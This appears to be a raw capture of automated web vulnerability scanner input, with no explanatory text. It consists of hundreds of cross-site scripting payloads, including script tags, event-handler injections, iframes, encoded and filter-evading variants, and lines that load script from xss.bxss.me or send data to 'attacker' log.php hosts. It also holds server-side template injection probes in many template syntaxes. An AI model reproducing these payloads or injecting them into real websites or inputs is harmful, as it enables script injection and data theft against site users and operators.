bfgx6557\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6557

555c43Bp <ScRiPt >iegi(9435)</ScRiPt>

dfb{{98991*97996}}xca

555<alSgt9W<

<%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(9933(9955))}

555reu80 <ScRiPt >70Mz(9803)</ScRiPt>

555<svg \xa0onload=gceR(9220)

555<WMQUWS>P98XX[!+!]</WMQUWS>

555<svg \xa0onload=YnxO(9968)

<th:t="${dfb}#foreach

dfb{{98991*97996}}xca

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=gceR(9680)>

555<W9KUBA>FHBLH[!+!]</W9KUBA>

555<WOCBIW>KF1UI[!+!]</WOCBIW>

dfb{98991*97996}xca

555

5556FCnA <ScRiPt >9933(9637)</ScRiPt>

555

555<ifRAme sRc=9295.com></IfRamE>

555<ifRAme sRc=9563.com></IfRamE>

555

555<isindex type=image src=1 onerror=YnxO(9189)>

555<ifRAme sRc=9539.com></IfRamE>

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

dfb${98991*97996}xca

555<WSCNNM>QTKIV[!+!]</WSCNNM>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<body onload=gceR(9817)>

555<a7X5y8K x=9761>

555<iframe src='data:text/html

555

555<anHOBFT x=9158>

555

555<aqur6S0 x=9454>

555<ifRAme sRc=9010.com></IfRamE>

555<img sRc='http://attacker-9649/log.php?

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img sRc='http://attacker-9516/log.php?

dfb#{98991*97996}xca

555

555<img sRc='http://attacker-9947/log.php?

555<body onload=YnxO(9556)>

555<img src=//xss.bxss.me/t/dot.gif onload=gceR(9105)>

555<a8OYYUo<

dfb[[${98991*97996}]]xca

555<aI4Iki1<

555<azlnOE8 x=9742>

dfb{#98991*97996}xca

555<aslHwv2<

dfb{{98991*97996}}xca

555

555<img src=//xss.bxss.me/t/dot.gif onload=YnxO(9669)>

555<img src=xyz OnErRor=gceR(9142)>

dfb__${98991*97996}__::.x

dfb{@98991*97996}xca

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

555<img sRc='http://attacker-9145/log.php?

555'"()&%<zzz><ScRiPt >XgpU(9333)</ScRiPt>

555<img/src=">" onerror=alert(9931)>

555<img src=xyz OnErRor=YnxO(9169)>

dfb{{=98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555'"()&%<zzz><ScRiPt >GVwd(9541)</ScRiPt>

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb@(98991*97996)xca

'"()&%<zzz><ScRiPt >XgpU(9995)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%67%63%65%52%289241%29%3C%2F%73%43%72%69%70%54%3E

555<a4gb2Hs<

555<ScRiPt >mUeQ(9257)</ScRiPt>

dfb<%=98991*97996%>xca

555<img/src=">" onerror=alert(9572)>

'"()&%<zzz><ScRiPt >GVwd(9140)</ScRiPt>

555\u003CScRiPt\gceR(9029)\u003C/sCripT\u003E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

%35%35%35%3C%53%63%52%69%50%74%20%3E%59%6E%78%4F%289606%29%3C%2F%73%43%72%69%70%54%3E

5559976410

5559662773

dfb__${98991*97996}__::.x

555<WNBPHF>GYCKA[!+!]</WNBPHF>

dfb#set($x=98991*97996)${x}xca

555<ScRiPt >8AFh(9123)</ScRiPt>

bfg8961\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8961

555&lt

555\u003CScRiPt\YnxO(9064)\u003C/sCripT\u003E

555<script>mUeQ(9455)</script>

555<WEQKRY>LHYAG[!+!]</WEQKRY>

555'"()&%<zzz><ScRiPt >Hqvp(9304)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfg5053\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5053

dfb{{"abc"|title}}xca

bfgx1387\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1387

\xf6<img zzz onmouseover=gceR(93131) //\xf6>

555<ScRiPt >VtWI(9840)</ScRiPt>

555<script>mUeQ(9784)</script>9784

print("dfb" . 98991*97996 . "xca")

555<script>8AFh(9197)</script>

555<input autofocus onfocus=gceR(9393)>

555'"()&%<zzz><ScRiPt >nkFb(9527)</ScRiPt>

'"()&%<zzz><ScRiPt >Hqvp(9785)</ScRiPt>

bfgx2362\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2362

555&lt

<%={{={@{#{${dfb}}%>

98991*97996*98991*97996

555<WP1OEY>8235X[!+!]</WP1OEY>

555<script>8AFh(9396)</script>9396

\xf6<img zzz onmouseover=YnxO(95561) //\xf6>

<%={{={@{#{${dfb}}%>

555<ScR<ScRiPt>IpT>mUeQ(9258)</sCr<ScRiPt>IpT>

dfb{@math key=98991 method="multiply" operand=97996/}xca

'"()&%<zzz><ScRiPt >nkFb(9676)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

<th:t="${dfb}#foreach

5559517383

555<ScR<ScRiPt>IpT>8AFh(9064)</sCr<ScRiPt>IpT>

555

555<input autofocus onfocus=YnxO(9468)>

555<ScRiPt >mUeQ(9672)</ScRiPt>

5559618319

555<script>VtWI(9114)</script>

dfb{{{this}}}xca

bfg5947\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5947

<th:t="${dfb}#foreach

<a HrEF=jaVaScRiPT:>

555

bfg10560\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10560

#{98991*97996*98991*97996}

555<script>VtWI(9858)</script>9858

bfgx7858\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7858

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >8AFh(9009)</ScRiPt>

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9503></ScRiPt>

555<ScR<ScRiPt>IpT>VtWI(9950)</sCr<ScRiPt>IpT>

<a HrEF=jaVaScRiPT:>

<%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9331></ScRiPt>

555}body{zzz:Expre/**/SSion(gceR(9395))}

dfb#{xca}=123

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

bfgx10704\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10704

555

555}body{zzz:Expre/**/SSion(YnxO(9252))}

dfb{{'abcd'.toUpperCase()}}xca

dfb{{98991*97996}}xca

555<ScRiPt >8AFh(9117)</ScRiPt>

555i0Wsk <ScRiPt >gceR(9391)</ScRiPt>

555<ScRiPt >mUeQ(9327)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<ScRiPt >VtWI(9759)</ScRiPt>

5557L92p <ScRiPt >YnxO(9286)</ScRiPt>

dfb{{98991*97996}}xca

dfb{98991*97996}xca

555<svg \xa0onload=mUeQ(9108)

555<WHFWQB>ABHBU[!+!]</WHFWQB>

dfb{{98991*97996}}xca

555<svg \xa0onload=8AFh(9517)

dfb[[${98991*97996}]]xca

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

dfb{{98991*97996}}xca

555<WSPWQZ>EDNDC[!+!]</WSPWQZ>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9461></ScRiPt>

555<isindex type=image src=1 onerror=8AFh(9922)>

dfb{{98991*97996}}xca

dfb${98991*97996}xca

dfb__${98991*97996}__::.x

555<isindex type=image src=1 onerror=mUeQ(9300)>

555

dfb{98991*97996}xca

555<ifRAme sRc=9344.com></IfRamE>

555<ifRAme sRc=9372.com></IfRamE>

dfb#{98991*97996}xca

555<iframe src='data:text/html

555<a61pk7q x=9184>

555<aOD1BUl x=9482>

555<iframe src='data:text/html

555<ScRiPt >VtWI(9854)</ScRiPt>

<th:t="${dfb}#foreach

dfb[[${98991*97996}]]xca

dfb${98991*97996}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{#98991*97996}xca

555<img sRc='http://attacker-9218/log.php?

555

555<body onload=mUeQ(9251)>

555<svg \xa0onload=VtWI(9630)

dfb{@98991*97996}xca

555<body onload=8AFh(9646)>

dfb__${98991*97996}__::.x

555<isindex type=image src=1 onerror=VtWI(9920)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{=98991*97996}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=mUeQ(9758)>

555<img sRc='http://attacker-9132/log.php?

555<aFDnjiG<

555<ScRiPt >XgpU(9586)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=8AFh(9003)>

dfb#{98991*97996}xca

555<img src=xyz OnErRor=mUeQ(9244)>

555<WNXL3O>ZJEYH[!+!]</WNXL3O>

dfb@(98991*97996)xca

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<iframe src='data:text/html

555<alMJCOg<

555<img/src=">" onerror=alert(9512)>

555<body onload=VtWI(9170)>

dfb{#98991*97996}xca

dfb{{98991*97996}}xca

555<script>XgpU(9275)</script>

dfb<%=98991*97996%>xca

555<ScRiPt >dFsR(9323)</ScRiPt>

555<img src=xyz OnErRor=8AFh(9833)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6D%55%65%51%289586%29%3C%2F%73%43%72%69%70%54%3E

dfb[[${98991*97996}]]xca

dfb#set($x=98991*97996)${x}xca

555<img src=//xss.bxss.me/t/dot.gif onload=VtWI(9137)>

555<img/src=">" onerror=alert(9395)>

555<script>XgpU(9490)</script>9490

dfb{@98991*97996}xca

555<WAPVGV>UPJRP[!+!]</WAPVGV>

555<img src=xyz OnErRor=VtWI(9289)>

555\u003CScRiPt\mUeQ(9195)\u003C/sCripT\u003E

dfb{{"abc"|title}}xca

dfb__${98991*97996}__::.x

555<script>dFsR(9520)</script>

555<ScR<ScRiPt>IpT>XgpU(9112)</sCr<ScRiPt>IpT>

%35%35%35%3C%53%63%52%69%50%74%20%3E%38%41%46%68%289061%29%3C%2F%73%43%72%69%70%54%3E

555&lt

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

print("dfb" . 98991*97996 . "xca")

dfb{{=98991*97996}}xca

555<img/src=">" onerror=alert(9320)>

555<script>dFsR(9299)</script>9299

555\u003CScRiPt\8AFh(9977)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%56%74%57%49%289570%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt >XgpU(9279)</ScRiPt>

98991*97996*98991*97996

dfb@(98991*97996)xca

\xf6<img zzz onmouseover=mUeQ(97771) //\xf6>

555&lt

555<ScRiPt >nkFb(9953)</ScRiPt>

555'"()&%<zzz><ScRiPt >oOYF(9117)</ScRiPt>

555<ScR<ScRiPt>IpT>dFsR(9100)</sCr<ScRiPt>IpT>

555\u003CScRiPt\VtWI(9081)\u003C/sCripT\u003E

555<ScRiPt >dFsR(9430)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9182></ScRiPt>

555&lt

dfb{@math key=98991 method="multiply" operand=97996/}xca

'"()&%<zzz><ScRiPt >oOYF(9557)</ScRiPt>

\xf6<img zzz onmouseover=8AFh(98201) //\xf6>

555<WGAGU4>CF0MH[!+!]</WGAGU4>

555'"()&%<zzz><ScRiPt >dk4Z(9088)</ScRiPt>

555<input autofocus onfocus=mUeQ(9706)>

dfb<%=98991*97996%>xca

555<ScRiPt >XgpU(9318)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9550></ScRiPt>

\xf6<img zzz onmouseover=VtWI(91991) //\xf6>

dfb#set($x=98991*97996)${x}xca

<a HrEF=http://xss.bxss.me></a>

555<script>nkFb(9396)</script>

555<svg \xa0onload=XgpU(9953)

'"()&%<zzz><ScRiPt >dk4Z(9010)</ScRiPt>

5559166249

dfb{{{this}}}xca

555<ScRiPt >dFsR(9482)</ScRiPt>

555<input autofocus onfocus=8AFh(9075)>

555<input autofocus onfocus=VtWI(9891)>

dfb{{"abc"|title}}xca

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

#{98991*97996*98991*97996}

bfg9756\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9756

555<isindex type=image src=1 onerror=XgpU(9367)>

555<script>nkFb(9233)</script>9233

5559516029

print("dfb" . 98991*97996 . "xca")

<a HrEF=http://xss.bxss.me></a>

555<svg \xa0onload=dFsR(9314)

555}body{zzz:Expre/**/SSion(mUeQ(9804))}

555<iframe src='data:text/html

dfb#{xca}=123

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

555<ScR<ScRiPt>IpT>nkFb(9552)</sCr<ScRiPt>IpT>

555<body onload=XgpU(9137)>

98991*97996*98991*97996

555j2309 <ScRiPt >mUeQ(9365)</ScRiPt>

bfg7076\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7076

555<isindex type=image src=1 onerror=dFsR(9704)>

bfgx7841\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7841

555}body{zzz:Expre/**/SSion(8AFh(9272))}

555<ScRiPt >nkFb(9216)</ScRiPt>

555}body{zzz:Expre/**/SSion(VtWI(9775))}

dfb{{'abcd'.toUpperCase()}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=XgpU(9041)>

555<WUK1FF>JEXM5[!+!]</WUK1FF>

bfgx9494\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9494

<%={{={@{#{${dfb}}%>

dfb{@math key=98991 method="multiply" operand=97996/}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9406></ScRiPt>

555<iframe src='data:text/html

555HN2SA <ScRiPt >8AFh(9158)</ScRiPt>

555n4bva <ScRiPt >VtWI(9293)</ScRiPt>

555<ifRAme sRc=9139.com></IfRamE>

dfb{{{this}}}xca

555

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555'"()&%<zzz><ScRiPt >M3G4(9815)</ScRiPt>

555<img src=xyz OnErRor=XgpU(9713)>

555'"()&%<zzz><ScRiPt >Pjcn(9743)</ScRiPt>

555<ScRiPt >nkFb(9903)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<WMNJGV>RBUP9[!+!]</WMNJGV>

555<a6h4xrb x=9646>

555<body onload=dFsR(9831)>

555<WATTFI>ACDFC[!+!]</WATTFI>

<th:t="${dfb}#foreach

dfb{{98991*97996}}xca

'"()&%<zzz><ScRiPt >M3G4(9444)</ScRiPt>

'"()&%<zzz><ScRiPt >Pjcn(9736)</ScRiPt>

555<svg \xa0onload=nkFb(9749)

#{98991*97996*98991*97996}

555

555<ifRAme sRc=9094.com></IfRamE>

555<img sRc='http://attacker-9647/log.php?

555<img/src=">" onerror=alert(9107)>

555<img src=//xss.bxss.me/t/dot.gif onload=dFsR(9518)>

555

555<ifRAme sRc=9559.com></IfRamE>

5559235326

dfb[[${98991*97996}]]xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%58%67%70%55%289473%29%3C%2F%73%43%72%69%70%54%3E

dfb#{xca}=123

555<acuve4D x=9255>

555<aBsGSWK<

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=xyz OnErRor=dFsR(9250)>

bfg6316\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6316

555<isindex type=image src=1 onerror=nkFb(9199)>

<th:t="${dfb}#foreach

5559917450

555<img sRc='http://attacker-9825/log.php?

555<aOpZvMu x=9612>

dfb__${98991*97996}__::.x

555\u003CScRiPt\XgpU(9452)\u003C/sCripT\u003E

555

555

dfb{{'abcd'.toUpperCase()}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img sRc='http://attacker-9719/log.php?

555<img/src=">" onerror=alert(9235)>

bfgx1182\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1182

555<iframe src='data:text/html

555<aPu4Fqa<

bfg3750\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3750

dfb{{98991*97996}}xca

555<anzSZEc<

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555&lt

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%64%46%73%52%289615%29%3C%2F%73%43%72%69%70%54%3E

\xf6<img zzz onmouseover=XgpU(92771) //\xf6>

555<body onload=nkFb(9909)>

bfgx1626\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1626

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

<%={{={@{#{${dfb}}%>

555'"()&%<zzz><ScRiPt >TIPw(9786)</ScRiPt>

dfb{{98991*97996}}xca

555'"()&%<zzz><ScRiPt >oewW(9518)</ScRiPt>

555\u003CScRiPt\dFsR(9131)\u003C/sCripT\u003E

555<ScRiPt >GVwd(9654)</ScRiPt>

555<input autofocus onfocus=XgpU(9750)>

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

555

'"()&%<zzz><ScRiPt >TIPw(9321)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<img src=//xss.bxss.me/t/dot.gif onload=nkFb(9885)>

555&lt

'"()&%<zzz><ScRiPt >oewW(9383)</ScRiPt>

555<WJ9VN0>DEFYT[!+!]</WJ9VN0>

<a HrEF=http://xss.bxss.me></a>

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<th:t="${dfb}#foreach

5559112410

dfb__${98991*97996}__::.x

<a HrEF=jaVaScRiPT:>

\xf6<img zzz onmouseover=dFsR(90771) //\xf6>

5559309539

555

555<img src=xyz OnErRor=nkFb(9609)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<script>GVwd(9705)</script>

555<ScRiPt >oOYF(9327)</ScRiPt>

555<img/src=">" onerror=alert(9668)>

555<ScRiPt >Hqvp(9988)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfg5759\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5759

bfg2379\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2379

555

555<script>GVwd(9646)</script>9646

555}body{zzz:Expre/**/SSion(XgpU(9341))}

555<input autofocus onfocus=dFsR(9501)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6E%6B%46%62%289762%29%3C%2F%73%43%72%69%70%54%3E

bfgx5813\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5813

555<WIZ4O5>NCBC0[!+!]</WIZ4O5>

555<WH2Z3W>YVWKF[!+!]</WH2Z3W>

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ScRiPt >dk4Z(9900)</ScRiPt>

bfgx8377\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8377

555'"()&%<zzz><ScRiPt >9n5T(9645)</ScRiPt>

555FHAju <ScRiPt >XgpU(9805)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<ScR<ScRiPt>IpT>GVwd(9508)</sCr<ScRiPt>IpT>

555'"()&%<zzz><ScRiPt >lLKj(9390)</ScRiPt>

555<script>oOYF(9673)</script>

'"()&%<zzz><ScRiPt >9n5T(9084)</ScRiPt>

555<WDWBRW>G3Q8J[!+!]</WDWBRW>

555<script>Hqvp(9748)</script>

555

<a HrEF=http://xss.bxss.me></a>

555\u003CScRiPt\nkFb(9286)\u003C/sCripT\u003E

<%={{={@{#{${dfb}}%>

555<ScRiPt >GVwd(9841)</ScRiPt>

555<script>dk4Z(9021)</script>

'"()&%<zzz><ScRiPt >lLKj(9315)</ScRiPt>

555<script>oOYF(9475)</script>9475

555

555<WYUEXA>PILAW[!+!]</WYUEXA>

555

<a HrEF=jaVaScRiPT:>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<script>Hqvp(9160)</script>9160

5559248680

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9160></ScRiPt>

555<script>dk4Z(9008)</script>9008

555&lt

555

<th:t="${dfb}#foreach

555<ScR<ScRiPt>IpT>oOYF(9752)</sCr<ScRiPt>IpT>

dfb{{98991*97996}}xca

5559721264

555

555<ifRAme sRc=9551.com></IfRamE>

bfg2353\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2353

dfb{{98991*97996}}xca

555<ScRiPt >GVwd(9589)</ScRiPt>

555}body{zzz:Expre/**/SSion(dFsR(9037))}

555<ScRiPt >oOYF(9577)</ScRiPt>

555<ScR<ScRiPt>IpT>Hqvp(9645)</sCr<ScRiPt>IpT>

\xf6<img zzz onmouseover=nkFb(99231) //\xf6>

<th:t="${dfb}#foreach

bfgx8870\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8870

555<aT2lthO x=9766>

555<ScR<ScRiPt>IpT>dk4Z(9138)</sCr<ScRiPt>IpT>

555IFMt0 <ScRiPt >dFsR(9064)</ScRiPt>

bfg8225\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8225

555

dfb[[${98991*97996}]]xca

555<ScRiPt >Hqvp(9459)</ScRiPt>

555<input autofocus onfocus=nkFb(9715)>

555<svg \xa0onload=GVwd(9851)

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9103></ScRiPt>

dfb[[${98991*97996}]]xca

555<W8FUJ0>T3ASN[!+!]</W8FUJ0>

<a HrEF=http://xss.bxss.me></a>

555<img sRc='http://attacker-9670/log.php?

555<ScRiPt >dk4Z(9732)</ScRiPt>

bfgx2573\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2573

<%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=GVwd(9922)>

dfb__${98991*97996}__::.x

555

555

dfb__${98991*97996}__::.x

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9402></ScRiPt>

555<ifRAme sRc=9424.com></IfRamE>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9104></ScRiPt>

555

555<ScRiPt >oOYF(9473)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

555<ScRiPt >Hqvp(9182)</ScRiPt>

555<afXvZxA x=9477>

<a HrEF=jaVaScRiPT:>

555<aGO6mev<

dfb{{98991*97996}}xca

555<ScRiPt >dk4Z(9645)</ScRiPt>

555

555<svg \xa0onload=oOYF(9207)

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<body onload=GVwd(9843)>

<th:t="${dfb}#foreach

555<svg \xa0onload=Hqvp(9303)

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(nkFb(9988))}

dfb[[${98991*97996}]]xca

555

<th:t="${dfb}#foreach

555<isindex type=image src=1 onerror=oOYF(9521)>

555<img sRc='http://attacker-9495/log.php?

555<isindex type=image src=1 onerror=Hqvp(9295)>

555<svg \xa0onload=dk4Z(9504)

555

555<ScRiPt >M3G4(9680)</ScRiPt>

dfb__${98991*97996}__::.x

555<img src=//xss.bxss.me/t/dot.gif onload=GVwd(9551)>

555<ScRiPt >Pjcn(9163)</ScRiPt>

555<WHCHMU>C7CCZ[!+!]</WHCHMU>

555

555<isindex type=image src=1 onerror=dk4Z(9924)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

555<aLH9qIh<

555ccJKI <ScRiPt >nkFb(9182)</ScRiPt>

555<iframe src='data:text/html

555

555<body onload=Hqvp(9388)>

555<WUCCDD>JQLQ4[!+!]</WUCCDD>

555<script>M3G4(9098)</script>

dfb{{98991*97996}}xca

555<img src=xyz OnErRor=GVwd(9634)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<iframe src='data:text/html

555<body onload=oOYF(9671)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<script>M3G4(9399)</script>9399

555<img/src=">" onerror=alert(9093)>

555<ScRiPt >TIPw(9775)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=Hqvp(9445)>

555<WNSJ3F>6L86A[!+!]</WNSJ3F>

555<body onload=dk4Z(9091)>

555<script>Pjcn(9706)</script>

555<ScR<ScRiPt>IpT>M3G4(9281)</sCr<ScRiPt>IpT>

dfb{{98991*97996}}xca

555<img src=xyz OnErRor=Hqvp(9712)>

dfb[[${98991*97996}]]xca

555

555<WZ9RMQ>OW0H2[!+!]</WZ9RMQ>

555<img src=//xss.bxss.me/t/dot.gif onload=oOYF(9128)>

555<img src=//xss.bxss.me/t/dot.gif onload=dk4Z(9324)>

555<img/src=">" onerror=alert(9145)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%47%56%77%64%289645%29%3C%2F%73%43%72%69%70%54%3E

555<script>Pjcn(9939)</script>9939

555<img src=xyz OnErRor=oOYF(9678)>

555<img src=xyz OnErRor=dk4Z(9495)>

dfb[[${98991*97996}]]xca

555<ScRiPt >M3G4(9164)</ScRiPt>

dfb{{98991*97996}}xca

555<ScR<ScRiPt>IpT>Pjcn(9283)</sCr<ScRiPt>IpT>

555<script>TIPw(9377)</script>

%35%35%35%3C%53%63%52%69%50%74%20%3E%48%71%76%70%289317%29%3C%2F%73%43%72%69%70%54%3E

dfb__${98991*97996}__::.x

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9193></ScRiPt>

dfb[[${98991*97996}]]xca

555\u003CScRiPt\GVwd(9648)\u003C/sCripT\u003E

555<script>TIPw(9808)</script>9808

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img/src=">" onerror=alert(9326)>

555<img/src=">" onerror=alert(9245)>

dfb__${98991*97996}__::.x

555\u003CScRiPt\Hqvp(9901)\u003C/sCripT\u003E

555<ScRiPt >Pjcn(9659)</ScRiPt>

555<ScRiPt >M3G4(9847)</ScRiPt>

555&lt

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9311></ScRiPt>

555&lt

\xf6<img zzz onmouseover=GVwd(92181) //\xf6>

555<svg \xa0onload=M3G4(9484)

dfb__${98991*97996}__::.x

%35%35%35%3C%53%63%52%69%50%74%20%3E%64%6B%34%5A%289084%29%3C%2F%73%43%72%69%70%54%3E

555<ScR<ScRiPt>IpT>TIPw(9883)</sCr<ScRiPt>IpT>

\xf6<img zzz onmouseover=Hqvp(99721) //\xf6>

555<ScRiPt >Pjcn(9033)</ScRiPt>

555<ScRiPt >oewW(9585)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%4F%59%46%289019%29%3C%2F%73%43%72%69%70%54%3E

555<isindex type=image src=1 onerror=M3G4(9906)>

555\u003CScRiPt\dk4Z(9407)\u003C/sCripT\u003E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >TIPw(9187)</ScRiPt>

555<svg \xa0onload=Pjcn(9004)

555<WF1GG2>TIUMR[!+!]</WF1GG2>

555<input autofocus onfocus=GVwd(9373)>

555<ScRiPt >9n5T(9705)</ScRiPt>

555&lt

555<input autofocus onfocus=Hqvp(9108)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9462></ScRiPt>

555\u003CScRiPt\oOYF(9620)\u003C/sCripT\u003E

555<iframe src='data:text/html

555<ScRiPt >lLKj(9848)</ScRiPt>

555<WTZYPY>K4NEA[!+!]</WTZYPY>

555<isindex type=image src=1 onerror=Pjcn(9630)>

\xf6<img zzz onmouseover=dk4Z(99661) //\xf6>

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >TIPw(9752)</ScRiPt>

555<script>oewW(9200)</script>

555'"()&%<zzz><ScRiPt >jNoP(9555)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<WVUFL0>WLEMJ[!+!]</WVUFL0>

555&lt

555<svg \xa0onload=TIPw(9573)

555<script>oewW(9181)</script>9181

555<iframe src='data:text/html

555<body onload=M3G4(9767)>

555<script>9n5T(9335)</script>

555<input autofocus onfocus=dk4Z(9550)>

555'"()&%<zzz><ScRiPt >9G0z(9305)</ScRiPt>

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

555<body onload=Pjcn(9071)>

555<script>lLKj(9016)</script>

'"()&%<zzz><ScRiPt >jNoP(9607)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<isindex type=image src=1 onerror=TIPw(9538)>

555}body{zzz:Expre/**/SSion(GVwd(9792))}

555<script>9n5T(9591)</script>9591

555<img src=//xss.bxss.me/t/dot.gif onload=Pjcn(9431)>

555<script>lLKj(9389)</script>9389

555}body{zzz:Expre/**/SSion(Hqvp(9650))}

555<img src=//xss.bxss.me/t/dot.gif onload=M3G4(9581)>

\xf6<img zzz onmouseover=oOYF(98371) //\xf6>

555<ScR<ScRiPt>IpT>oewW(9832)</sCr<ScRiPt>IpT>

'"()&%<zzz><ScRiPt >9G0z(9842)</ScRiPt>

5559759208

<a HrEF=jaVaScRiPT:>

555<iframe src='data:text/html

555<ScRiPt >oewW(9169)</ScRiPt>

5559943662

555<img src=xyz OnErRor=M3G4(9655)>

555}body{zzz:Expre/**/SSion(dk4Z(9931))}

